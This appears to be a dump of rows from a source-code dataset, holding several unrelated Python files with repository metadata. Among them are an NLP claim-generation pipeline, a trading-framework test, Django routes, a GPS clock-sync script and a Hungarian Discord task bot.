val_claim_gen_input = run_question_generation(qg_trainer, val_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
test_claim_gen_input = run_question_generation(qg_trainer, test_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
qg_model.to('cpu')
############ Generate claims from questions
q2c_model.to(device)
preprocessor = partial(q2c_data_preprocess, q2c_tokenizer, 'citeworth')
gen_dset_base = Dataset.from_dict(claim_gen_input)
val_gen_dset_base = Dataset.from_dict(val_claim_gen_input)
test_gen_dset_base = Dataset.from_dict(test_claim_gen_input)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
q2c_tokenizer,
model=q2c_model,
label_pad_token_id=-100,
padding='longest'
)
q2c_trainer = CustomTrainer(
model=q2c_model,
tokenizer=q2c_tokenizer,
data_collator=data_collator
)
generated_claims, fc_claim_inputs = run_claim_generation(q2c_trainer, gen_dset, q2c_model, q2c_tokenizer, device, args.num_beams)
val_generated_claims, _ = run_claim_generation(q2c_trainer, val_gen_dset, q2c_model, q2c_tokenizer,
device, args.num_beams)
test_generated_claims, _ = run_claim_generation(q2c_trainer, test_gen_dset, q2c_model, q2c_tokenizer, device,
args.num_beams)
with open(f"{save_dir}/output_test_claims.jsonl", 'wt') as f:
for c in test_generated_claims:
f.write(json.dumps(c) + '\n')
with open(f"{save_dir}/output_scifact_dev_claims.jsonl", 'wt') as f:
for c in val_generated_claims:
f.write(json.dumps(c) + '\n')
q2c_model.to('cpu')
# Run FC model
fc_model.to(device)
#TODO get the data into the right format
fc_dev_set = SciFactParagraphBatchDataset(args.external_corpus_file, fc_claim_inputs,
sep_token=fc_tokenizer.sep_token, k=0, train=False)
rationale_predictions, stance_preds, stance_scores = predict(fc_model, fc_dev_set, 16, args.fc_model_name, fc_tokenizer, device)
rationale_json = rationale2json(fc_dev_set.samples, rationale_predictions)
stance_json = stance2json(fc_dev_set.samples, stance_preds, stance_scores)
stance_json = post_process_stance(rationale_json, stance_json)
merged_json = merge_json(rationale_json, stance_json)
fc_model.to('cpu')
# Rank predictions
sorted_fc_claims = sort_fc_claims(merged_json, generated_claims)
# Get new entities
citance_entity_map = defaultdict(lambda: {'text': '', 'entities': []})
original_claims = [c for c in sorted_fc_claims if c['score'] > 0.5]
for c in original_claims:
citance_entity_map[c['id']]['text'] = c['citance']
citance_entity_map[c['id']]['entities'].append(
(c['answer']['start'], c['answer']['start'] + len(c['answer']['text']), 'ENTITY'))
output_claims.extend(original_claims)
citances = [c for c in citances if c['doc_id'] not in citance_entity_map]
output_claims.extend([c for c in sorted_fc_claims if c['score'] <= 0.5])
with open(f"{save_dir}/added_claims.jsonl", 'wt') as f:
for c in output_claims:
f.write(json.dumps(c) + '\n')
csv_out = []
for c in output_claims:
csv_out.append([c['context'], c['citance'], c['generated_claim'], c['score']])
csv_pd = pd.DataFrame(csv_out, columns=['Context', 'Original Sentence', 'Claim', 'Score'])
csv_pd.to_csv(f"{save_dir}/ranked_claims.csv", index=None)
# Generate training data for fact checking
nli = pipeline('sentiment-analysis', model='roberta-large-mnli', return_all_scores=True, device=0)
# Generate data for scifact training/evaluation
for claim_set in tqdm(test_generated_claims):
neg_claims = kbin([claim_set['generated_claim']], nli, lm, lm_tk, device, 3)
claim_set['neg_claim'] = neg_claims[0][2] if neg_claims[0] is not None else None
# Get corpus so we can pick negative samples for NEI
paper_id_to_paragraph = defaultdict(list)
with open(args.internal_corpus_file) as f:
for l in f:
data = json.loads(l)
paper_id = data['doc_id'].split('_')[0]
paper_id_to_paragraph[paper_id].append(data)
# Pick 1/3 to be supports, 1/3 to be contradicts, and 1/3 to be NEI
def incgen():
val = 0
while True:
val += 1
yield val
inc = incgen()
base_claims_and_evidence = []
for claim_set in test_generated_claims:
# Remove ID suffix to get original paper ID
original_doc_id = claim_set['id']
original_doc_id = original_doc_id[:original_doc_id.rfind('_')]
pos_claim = claim_set['generated_claim']
neg_claim = claim_set['neg_claim']
type = random.randint(0, 2)
if type == 0 or neg_claim == None:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'SUPPORT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 1:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'CONTRADICT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 2:
nei_type = random.randint(0, 1)
if nei_type == 0:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
else:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
with open(f"{save_dir}/scifact_claims.jsonl", 'wt') as f:
for c in base_claims_and_evidence:
f.write(json.dumps(c) + '\n')
| 534 | 0 | 49 |
01c534ccc2c61e899ecd5e35875b52f9b079b3b7 | 1,442 | py | Python | tests/core/context/test_add_portfolio_manager.py | investing-algorithms/investing-algorithm-framework | d579e142a3857e2e2dfb59b7d6e54202f7df5466 | [
"Apache-2.0"
] | 1 | 2019-12-23T21:23:45.000Z | 2019-12-23T21:23:45.000Z | tests/core/context/test_add_portfolio_manager.py | investing-algorithms/investing-algorithm-framework | d579e142a3857e2e2dfb59b7d6e54202f7df5466 | [
"Apache-2.0"
] | null | null | null | tests/core/context/test_add_portfolio_manager.py | investing-algorithms/investing-algorithm-framework | d579e142a3857e2e2dfb59b7d6e54202f7df5466 | [
"Apache-2.0"
] | 1 | 2019-12-23T21:23:50.000Z | 2019-12-23T21:23:50.000Z | from typing import List
from investing_algorithm_framework import SQLLitePortfolioManager, Position, \
Order
from investing_algorithm_framework.core.exceptions import OperationalException
from investing_algorithm_framework.core.models import AssetPrice
from tests.resources import TestBase
| 32.044444 | 83 | 0.706657 | from typing import List
from investing_algorithm_framework import SQLLitePortfolioManager, Position, \
Order
from investing_algorithm_framework.core.exceptions import OperationalException
from investing_algorithm_framework.core.models import AssetPrice
from tests.resources import TestBase
class MyPortfolioManagerOne(SQLLitePortfolioManager):
identifier = "BINANCE"
trading_currency = "USDT"
def get_positions(self, algorithm_context=None, **kwargs) -> List[Position]:
return [
Position(target_symbol="USDT", amount=1000)
]
def get_orders(self, algorithm_context, **kwargs) -> List[Order]:
pass
def get_prices(self, symbols, algorithm_context, **kwargs) -> List[AssetPrice]:
pass
class Test(TestBase):
def test(self) -> None:
self.algo_app.algorithm.add_portfolio_manager(MyPortfolioManagerOne())
self.assertTrue(
MyPortfolioManagerOne.identifier in
self.algo_app.algorithm._portfolio_managers
)
def test_duplicate(self):
self.algo_app.algorithm.add_portfolio_manager(MyPortfolioManagerOne())
self.assertTrue(
MyPortfolioManagerOne.identifier in
self.algo_app.algorithm._portfolio_managers
)
with self.assertRaises(OperationalException):
self.algo_app.algorithm.add_portfolio_manager(
MyPortfolioManagerOne()
)
| 875 | 170 | 100 |
e9db867e258c76d19aa20449fdb22216123194fa | 94 | py | Python | azkaban-jobtype-{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/v2/params.py | globocom/azkaban-jobtype-cookiecutter | f586441d990493734c663d26b0f6b54984ccc945 | [
"MIT"
] | null | null | null | azkaban-jobtype-{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/v2/params.py | globocom/azkaban-jobtype-cookiecutter | f586441d990493734c663d26b0f6b54984ccc945 | [
"MIT"
] | null | null | null | azkaban-jobtype-{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/v2/params.py | globocom/azkaban-jobtype-cookiecutter | f586441d990493734c663d26b0f6b54984ccc945 | [
"MIT"
] | null | null | null | from auror_core.v2.params import Params
class {{cookiecutter.project_name}}(Params):
pass | 23.5 | 44 | 0.776596 | from auror_core.v2.params import Params
class {{cookiecutter.project_name}}(Params):
pass | 0 | 0 | 0 |
a6e19736a54a93a571242f4a476a7420ab121d6e | 1,162 | py | Python | mywayback.py | jsyk/mywayback | df007383db01dd0cde3434ea9426e1decb211308 | [
"MIT"
] | null | null | null | mywayback.py | jsyk/mywayback | df007383db01dd0cde3434ea9426e1decb211308 | [
"MIT"
] | null | null | null | mywayback.py | jsyk/mywayback | df007383db01dd0cde3434ea9426e1decb211308 | [
"MIT"
] | null | null | null | import sys, getopt
from os import path
import time
from configure import Configure
from scanner import FoundFile, Scanner
from checker import Checker
from taker import Taker
print("** Welcome to MyWayback! **")
args = sys.argv[1:]
if len(args) == 0:
print("ERROR: Missing command-line argument!")
exit(0)
targetbasedir = args[0]
print("Target directory: {}".format(targetbasedir))
snapshotname = time.strftime("%Y-%m-%d--%H-%M")
print("Snaphost name: {}".format(snapshotname))
cfg = Configure()
cfg.read_configdir(path.join(targetbasedir, 'config'))
print("Scan dirs (+):")
print(cfg.scandirs)
print("Skip dirs (-):")
print(cfg.skipdirs)
sca = Scanner()
#s.scan_dirtree('/home/jara/Dokumenty')
sca.scan_confdirs(cfg)
print()
print("SCANNER FINISHED: Number of found files: {}".format(sca.num_foundfiles))
print()
# for i in range(0, 10):
# ff = s.foundfiles.pop()
# print(ff.order, ff.fullname())
che = Checker(targetbasedir)
tak = Taker(targetbasedir, snapshotname)
batchsize = 1000
while sca.foundfiles or che.digestedfiles:
che.digest_files(sca, batchsize)
tak.take_files(che, batchsize)
print("** Finished a backup run with MyWayback! **")
| 22.784314 | 79 | 0.724613 | import sys, getopt
from os import path
import time
from configure import Configure
from scanner import FoundFile, Scanner
from checker import Checker
from taker import Taker
print("** Welcome to MyWayback! **")
args = sys.argv[1:]
if len(args) == 0:
print("ERROR: Missing command-line argument!")
exit(0)
targetbasedir = args[0]
print("Target directory: {}".format(targetbasedir))
snapshotname = time.strftime("%Y-%m-%d--%H-%M")
print("Snaphost name: {}".format(snapshotname))
cfg = Configure()
cfg.read_configdir(path.join(targetbasedir, 'config'))
print("Scan dirs (+):")
print(cfg.scandirs)
print("Skip dirs (-):")
print(cfg.skipdirs)
sca = Scanner()
#s.scan_dirtree('/home/jara/Dokumenty')
sca.scan_confdirs(cfg)
print()
print("SCANNER FINISHED: Number of found files: {}".format(sca.num_foundfiles))
print()
# for i in range(0, 10):
# ff = s.foundfiles.pop()
# print(ff.order, ff.fullname())
che = Checker(targetbasedir)
tak = Taker(targetbasedir, snapshotname)
batchsize = 1000
while sca.foundfiles or che.digestedfiles:
che.digest_files(sca, batchsize)
tak.take_files(che, batchsize)
print("** Finished a backup run with MyWayback! **")
| 0 | 0 | 0 |
ffb2de928830135b7881a885266b8f6b7bc6914f | 2,321 | py | Python | woodblock/scenario.py | fkie-cad/woodblock | ac4a590744021540fc7388765629bf3367f89e2e | [
"MIT"
] | 8 | 2019-08-14T08:57:21.000Z | 2022-02-18T01:35:24.000Z | woodblock/scenario.py | fkie-cad/woodblock | ac4a590744021540fc7388765629bf3367f89e2e | [
"MIT"
] | 1 | 2020-01-24T23:38:36.000Z | 2020-02-27T14:00:59.000Z | woodblock/scenario.py | fkie-cad/woodblock | ac4a590744021540fc7388765629bf3367f89e2e | [
"MIT"
] | 2 | 2019-08-22T15:30:53.000Z | 2020-01-24T23:11:34.000Z | """This module contains file carving scenario related classes and functions."""
from multimethod import multimethod
import woodblock.fragments
class Scenario(list):
"""This class represents a file carving scenario.
A scenario contains fragments in a certain order.
Args:
name: The name of the scenario.
"""
@multimethod
def add(self, fragment: woodblock.fragments.FillerFragment):
"""Add a filler fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragment: woodblock.fragments.FileFragment): # pylint: disable=function-redefined
"""Add a file fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragments: list): # pylint: disable=function-redefined
"""Add a list of fragments to the scenario.
Args:
fragments: The list of fragments to be added.
"""
self._add_from_iterable(fragments)
@multimethod
def add(self, fragments: tuple): # pylint: disable=function-redefined
"""Add a tuple of fragments to the scenario.
Args:
fragments: The tuple of fragments to be added.
"""
self._add_from_iterable(fragments)
@property
def metadata(self) -> dict:
"""Return the scenario metadata."""
meta = {'name': self.name, 'files': list()}
files = dict()
for frag in self:
frag_meta = frag.metadata
file_id = frag_meta['file']['id']
if file_id not in files:
files[file_id] = {'original': frag_meta['file'], 'fragments': list()}
files[file_id]['fragments'].append(frag_meta['fragment'])
meta['files'] = list(files.values())
self._sort_fragments_by_number(meta)
return meta
@staticmethod
| 29.379747 | 100 | 0.612236 | """This module contains file carving scenario related classes and functions."""
from multimethod import multimethod
import woodblock.fragments
class Scenario(list):
"""This class represents a file carving scenario.
A scenario contains fragments in a certain order.
Args:
name: The name of the scenario.
"""
def __init__(self, name: str):
list.__init__([])
self.name = name
@multimethod
def add(self, fragment: woodblock.fragments.FillerFragment):
"""Add a filler fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragment: woodblock.fragments.FileFragment): # pylint: disable=function-redefined
"""Add a file fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragments: list): # pylint: disable=function-redefined
"""Add a list of fragments to the scenario.
Args:
fragments: The list of fragments to be added.
"""
self._add_from_iterable(fragments)
@multimethod
def add(self, fragments: tuple): # pylint: disable=function-redefined
"""Add a tuple of fragments to the scenario.
Args:
fragments: The tuple of fragments to be added.
"""
self._add_from_iterable(fragments)
def _add_from_iterable(self, iterable):
self.extend(iterable)
@property
def metadata(self) -> dict:
"""Return the scenario metadata."""
meta = {'name': self.name, 'files': list()}
files = dict()
for frag in self:
frag_meta = frag.metadata
file_id = frag_meta['file']['id']
if file_id not in files:
files[file_id] = {'original': frag_meta['file'], 'fragments': list()}
files[file_id]['fragments'].append(frag_meta['fragment'])
meta['files'] = list(files.values())
self._sort_fragments_by_number(meta)
return meta
@staticmethod
def _sort_fragments_by_number(meta):
for file in meta['files']:
file['fragments'] = list(sorted(file['fragments'], key=lambda x: x['number']))
| 249 | 0 | 80 |
4c531e2c199cc4a3c924b62cbb1447d4a462d527 | 490 | py | Python | webdev/users/urls.py | h-zanetti/real-estate-manager | a526cfccf9589629c03ac7e3afe760ade0e48b7d | [
"MIT"
] | null | null | null | webdev/users/urls.py | h-zanetti/real-estate-manager | a526cfccf9589629c03ac7e3afe760ade0e48b7d | [
"MIT"
] | 22 | 2021-04-23T19:03:10.000Z | 2021-08-13T14:57:37.000Z | webdev/users/urls.py | h-zanetti/real-estate-manager | a526cfccf9589629c03ac7e3afe760ade0e48b7d | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('registro/', views.registro, name='registro'),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('minhas_reservas/', views.minhas_reservas, name='minhas_reservas'),
path('ser_anfitriao/', views.ser_anfitriao, name='ser_anfitriao'),
] | 44.545455 | 97 | 0.732653 | from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('registro/', views.registro, name='registro'),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('minhas_reservas/', views.minhas_reservas, name='minhas_reservas'),
path('ser_anfitriao/', views.ser_anfitriao, name='ser_anfitriao'),
] | 0 | 0 | 0 |
b47cac1ac9a109cefa86744f5d3542882c843b14 | 1,557 | py | Python | setup.py | SYAN83/pytorch-learn | f734baf0b837d7c87647ab43ca5de9248849dfa9 | [
"MIT"
] | null | null | null | setup.py | SYAN83/pytorch-learn | f734baf0b837d7c87647ab43ca5de9248849dfa9 | [
"MIT"
] | 1 | 2019-02-24T07:39:02.000Z | 2019-02-24T07:39:02.000Z | setup.py | SYAN83/pytorch-learn | f734baf0b837d7c87647ab43ca5de9248849dfa9 | [
"MIT"
] | null | null | null | from setuptools import setup
import re
APP_NAME = 'ptlearn'
VERSION = '0.1'
if __name__ == '__main__':
check_version()
setup(
name=APP_NAME,
version=VERSION,
description='A Python machine learing library, based on PyTorch',
long_description=readme(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
],
url='https://github.com/SYAN83/pytorch-learn',
author='Shu Yan',
author_email='yanshu.usc@gmail.com',
license='MIT',
packages=setuptools.find_packages(exclude=['tests']),
install_requires=[
'torch>=1.0.0',
],
include_package_data=True,
zip_safe=False
)
| 27.315789 | 73 | 0.558125 | from setuptools import setup
import re
APP_NAME = 'ptlearn'
VERSION = '0.1'
def readme():
with open('README.rst', 'r') as f:
return f.read()
def check_version():
global VERSION
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('ptlearn/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
VERSION = match.group(1)
else:
raise RuntimeError("No version number found!")
if __name__ == '__main__':
check_version()
setup(
name=APP_NAME,
version=VERSION,
description='A Python machine learing library, based on PyTorch',
long_description=readme(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
],
url='https://github.com/SYAN83/pytorch-learn',
author='Shu Yan',
author_email='yanshu.usc@gmail.com',
license='MIT',
packages=setuptools.find_packages(exclude=['tests']),
install_requires=[
'torch>=1.0.0',
],
include_package_data=True,
zip_safe=False
)
| 399 | 0 | 46 |
cdac9df18ec3645f342e324f40f6ff8659093533 | 6,170 | py | Python | utility/gps_and_states.py | mafavaron/MeteoFlux | a2fc66aac1faa97f12e07fba9bb3ef8aea60b5d7 | [
"MIT"
] | null | null | null | utility/gps_and_states.py | mafavaron/MeteoFlux | a2fc66aac1faa97f12e07fba9bb3ef8aea60b5d7 | [
"MIT"
] | null | null | null | utility/gps_and_states.py | mafavaron/MeteoFlux | a2fc66aac1faa97f12e07fba9bb3ef8aea60b5d7 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Task to maintain system RTC aligned with GPS time, coming from a
# Teltonka RUT955 terminal.
import socket
import sys
import time
import os
import logging
import logging.handlers
if __name__ == "__main__":
logger = logging.getLogger('GPS_Task')
logger.setLevel(logging.DEBUG)
handler = logging.handlers.RotatingFileHandler(
"/mnt/logs/gps.log", maxBytes=1024*1024, backupCount=5)
logger.addHandler(handler)
logger.info(logString("*** Starting execution"))
oldTimeStamp = 0.0
isFirst = True
myOwnIP = getIP()
logger.info(logString("This station's inferred IP: %s" % myOwnIP))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
logger.info(logString("Socket allocated"))
try:
sock.bind((myOwnIP, 17050))
logger.info(logString("Socket opened on port 17050 (check on Teltonika if same)"))
except Exception as e:
logger.error(logString("*** Terminating execution - Error: socket not opened: %s", str(e)))
sys.exit(1)
while True:
# Get status from /mnt/ramdisk/gps.dat
state = getState()
# Act, based on state
if state == 1: # Active
# Get most recent data from GPS pool
(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed) = getGpsData(sock, '192.162.1.1', 17050)
(rTimeStamp, iPriority, rLon, rLat, iHgt, iAng, iSat, iSpeed) = getMostRecentGpsLine(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed)
logger.info(logString("Last GPS fix: %f %f %f" % (rLat, rLon, iHgt)))
now = time.time()
deltaTime = abs(now - rTimeStamp)
if deltaTime > 10:
timeAlarm = "***"
setRTC(rTimeStamp)
logger.info(logString("RTC updated to GPS"))
else:
timeAlarm = ""
# Write GPS status data
f = open("/mnt/ramdisk/gps_state.txt", "w")
f.write("Time delta (RTC - GPS): %f %s\n" % (now - rTimeStamp, timeAlarm))
f.write("Lat, Lon: %f, %f\n" % (rLat, rLon))
f.write("Altitude: %d\n" % iHgt)
f.write("Angle: %d\n" % iAng)
f.write("Speed: %d\n" % iSpeed)
f.write("Satellites: %d\n" % iSat)
f.write("Message priority: %d\n" % iPriority)
f.close()
# Write positional data in computer-friendly form
f = open("/mnt/ramdisk/Position.csv", "w")
f.write("%f, %f, %d\n" % (rLat, rLon, iHgt))
f.close()
if isFirst:
isFirst = False
else:
if deltaTime > 60.0:
# No GPS updates ever since: force modem reboot....
logger.warning(logString("GPS is apparently blocked"))
isFirst = True
oldTimeStamp = 0.0
else:
oldTimeStamp = rTimeStamp
else: # Waiting: do nothing but waiting a little bit
time.sleep()
logger.info(logString("*** Terminating execution"))
| 25.92437 | 156 | 0.643598 | #!/usr/bin/python
# Task to maintain system RTC aligned with GPS time, coming from a
# Teltonka RUT955 terminal.
import socket
import sys
import time
import os
import logging
import logging.handlers
def getIP():
IP = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
return IP
def setRTC(desiredTimeStamp):
timeString = time.strftime("%m%d%H%M%Y.%S", time.gmtime(desiredTimeStamp))
os.system("date -u %s" % timeString)
os.system("hwclock -w")
def toInt(byteArray):
i = len(byteArray)
value = 0
for b in byteArray:
value = value*256 + b
return(value)
def getGpsData(sock, remoteIP, remotePort):
# Get one data line, check it corresponds to the correct address, and if so pass to the next step
while True:
data, adr = sock.recvfrom(4096)
if adr[0] == remoteIP:
break
# Convert string to byte array form
byteArray = bytearray()
byteArray.extend(map(ord,data))
if len(byteArray) < 2:
return None
# Compose message size
msgSize = toInt(byteArray[0:2])
packetId = byteArray[2]*256 + byteArray[3]
packetType = byteArray[4]
avlId = byteArray[5]
imeiLen = byteArray[6]*256 + byteArray[7]
imei = byteArray[8:(8+imeiLen)].decode("utf-8")
codecId = byteArray[8+imeiLen]
numData = byteArray[9+imeiLen]
base = 10 + imeiLen
rvTimeStamp = []
ivPriority = []
rvLon = []
rvLat = []
ivHgt = []
ivAng = []
ivSat = []
ivSpeed = []
for i in range(numData):
timeStamp = toInt(byteArray[base:(8+base)])/1000.0
priority = byteArray[8+base]
lon = toInt(byteArray[(9+base):(13+base)])/10000000.0
lat = toInt(byteArray[(13+base):(17+base)])/10000000.0
hgt = toInt(byteArray[(17+base):(19+base)])
ang = toInt(byteArray[(19+base):(21+base)])
sat = byteArray[21+base]
speed = toInt(byteArray[(22+base):(24+base)])
zeros = toInt(byteArray[(24+base):(30+base)])
rvTimeStamp.append(timeStamp)
ivPriority.append(priority)
rvLon.append(lon)
rvLat.append(lat)
ivHgt.append(hgt)
ivAng.append(ang)
ivSat.append(sat)
ivSpeed.append(speed)
base += 30
# Send acknowledge packet
ackPacket = bytearray([0,5,0xCA,0xFE,1,0,0])
ackPacket[5] = avlId
ackPacket[6] = numData
sock.sendto(ackPacket, (remoteIP, remotePort))
outData = (rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed)
return(outData)
def getMostRecentGpsLine(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed):
# Find the highest time stamp in line set
rHighestTimeStamp = 0.0
idx = -1
for timeStampIdx in range(len(rvTimeStamp)):
timeStamp = rvTimeStamp[timeStampIdx]
if timeStamp > rHighestTimeStamp:
rHighestTimeStamp = timeStamp
idx = timeStampIdx
# Post: 'idx' is -1 in case no time stamp was found, or the index of
# largest value
if idx < 0:
return (-9999.9, -9999, -9999.9, -9999.9, -9999, -9999, -9999, -9999)
# Get data
return (
rvTimeStamp[idx],
ivPriority[idx],
rvLon[idx],
rvLat[idx],
ivHgt[idx],
ivAng[idx],
ivSat[idx],
ivSpeed[idx]
)
def logString(string):
return "%s - %s" % (time.asctime(), string)
def getState():
# Assume active state
state = 1
# Get the desired state
try:
sf = file("/mnt/ramdisk/gps.csv", "r")
stateNames = sf.readlines()
sf.close()
if len(stateNames) > 0:
stateName = stateNames[0][:-1] # Get first line up to and excluding
if stateName == "active":
state = 1
else:
state = 0
except:
state = 1
return state
if __name__ == "__main__":
logger = logging.getLogger('GPS_Task')
logger.setLevel(logging.DEBUG)
handler = logging.handlers.RotatingFileHandler(
"/mnt/logs/gps.log", maxBytes=1024*1024, backupCount=5)
logger.addHandler(handler)
logger.info(logString("*** Starting execution"))
oldTimeStamp = 0.0
isFirst = True
myOwnIP = getIP()
logger.info(logString("This station's inferred IP: %s" % myOwnIP))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
logger.info(logString("Socket allocated"))
try:
sock.bind((myOwnIP, 17050))
logger.info(logString("Socket opened on port 17050 (check on Teltonika if same)"))
except Exception as e:
logger.error(logString("*** Terminating execution - Error: socket not opened: %s", str(e)))
sys.exit(1)
while True:
# Get status from /mnt/ramdisk/gps.dat
state = getState()
# Act, based on state
if state == 1: # Active
# Get most recent data from GPS pool
(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed) = getGpsData(sock, '192.162.1.1', 17050)
(rTimeStamp, iPriority, rLon, rLat, iHgt, iAng, iSat, iSpeed) = getMostRecentGpsLine(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed)
logger.info(logString("Last GPS fix: %f %f %f" % (rLat, rLon, iHgt)))
now = time.time()
deltaTime = abs(now - rTimeStamp)
if deltaTime > 10:
timeAlarm = "***"
setRTC(rTimeStamp)
logger.info(logString("RTC updated to GPS"))
else:
timeAlarm = ""
# Write GPS status data
f = open("/mnt/ramdisk/gps_state.txt", "w")
f.write("Time delta (RTC - GPS): %f %s\n" % (now - rTimeStamp, timeAlarm))
f.write("Lat, Lon: %f, %f\n" % (rLat, rLon))
f.write("Altitude: %d\n" % iHgt)
f.write("Angle: %d\n" % iAng)
f.write("Speed: %d\n" % iSpeed)
f.write("Satellites: %d\n" % iSat)
f.write("Message priority: %d\n" % iPriority)
f.close()
# Write positional data in computer-friendly form
f = open("/mnt/ramdisk/Position.csv", "w")
f.write("%f, %f, %d\n" % (rLat, rLon, iHgt))
f.close()
if isFirst:
isFirst = False
else:
if deltaTime > 60.0:
# No GPS updates ever since: force modem reboot....
logger.warning(logString("GPS is apparently blocked"))
isFirst = True
oldTimeStamp = 0.0
else:
oldTimeStamp = rTimeStamp
else: # Waiting: do nothing but waiting a little bit
time.sleep()
logger.info(logString("*** Terminating execution"))
| 3,200 | 0 | 162 |
683ac887e86d6f1048221167834abc61df55b5d0 | 4,495 | py | Python | bot.py | FightMan01/discord-feladat-r-gz-t- | 65f0f29247fa0b34ec7753e763a81c3f5e35c048 | [
"MIT"
] | 1 | 2020-04-28T07:25:40.000Z | 2020-04-28T07:25:40.000Z | bot.py | FightMan01/discord-feladat-rogzito | 65f0f29247fa0b34ec7753e763a81c3f5e35c048 | [
"MIT"
] | null | null | null | bot.py | FightMan01/discord-feladat-rogzito | 65f0f29247fa0b34ec7753e763a81c3f5e35c048 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands, tasks
import asyncio
import time
import datetime
import json
import aiohttp
import os
from discord import Webhook, AsyncWebhookAdapter
client = commands.AutoShardedBot(command_prefix=".")
Client = discord.Client()
client.remove_command('help')
with open("adat.json") as f:
adat = json.load(f)
@client.event
@client.command()
@tasks.loop(minutes=5)
@client.command()
client.run("TOKEN")
| 38.09322 | 153 | 0.576418 | import discord
from discord.ext import commands, tasks
import asyncio
import time
import datetime
import json
import aiohttp
import os
from discord import Webhook, AsyncWebhookAdapter
client = commands.AutoShardedBot(command_prefix=".")
Client = discord.Client()
client.remove_command('help')
with open("adat.json") as f:
adat = json.load(f)
@client.event
async def on_ready():
print("A bot készen van :P")
init.start()
await client.change_presence(activity=discord.Activity(name='Feladatok 👀', type=discord.ActivityType.watching), status=discord.Status.do_not_disturb)
@client.command()
async def rögzít(ctx, nap=None, *, szöveg=None):
if ctx.author.bot:
return
if not nap:
return await ctx.send(":x: Kérem adja meg, hány nap múlva esedékes a feladat.")
if not szöveg:
return await ctx.send(":x: Kérem adjon meg a feladathoz egy rövid szöveget!")
try:
nap = int(nap)
except:
return await ctx.send(":x: Kérem napnak csak számot adjon meg.")
esedékes = datetime.date.today() + datetime.timedelta(days=nap)
esedékes = str(esedékes.__format__("%Y.%m.%d."))
i = 0
for x in adat:
if not (x == "cache" or x == "cache2"):
i += 1
fid = i
if not "cache" in adat:
adat["cache"] = []
if not "cache2" in adat:
adat["cache2"] = []
adat[fid] = {}
adat[fid]["esedekes"] = esedékes
adat[fid]["szöveg"] = szöveg
adat[fid]["rögzítette"] = str(ctx.author.id)
with open("adat.json", "w") as f2:
json.dump(adat, f2)
await ctx.send(":white_check_mark: Feladat rögzítve!")
@tasks.loop(minutes=5)
async def init():
try:
await client.wait_until_ready()
await asyncio.gather(feladatell())
await asyncio.gather(feladatell2())
print("[INFO] ~> Feladat határidők ellenőrizve!")
except Exception as e:
print(f"[ERROR] ~> {e}")
async def feladatell():
for id in adat:
if not (id == "cache" or id == "cache2"):
if not id in adat["cache"]:
esedékes = adat[id]["esedekes"]
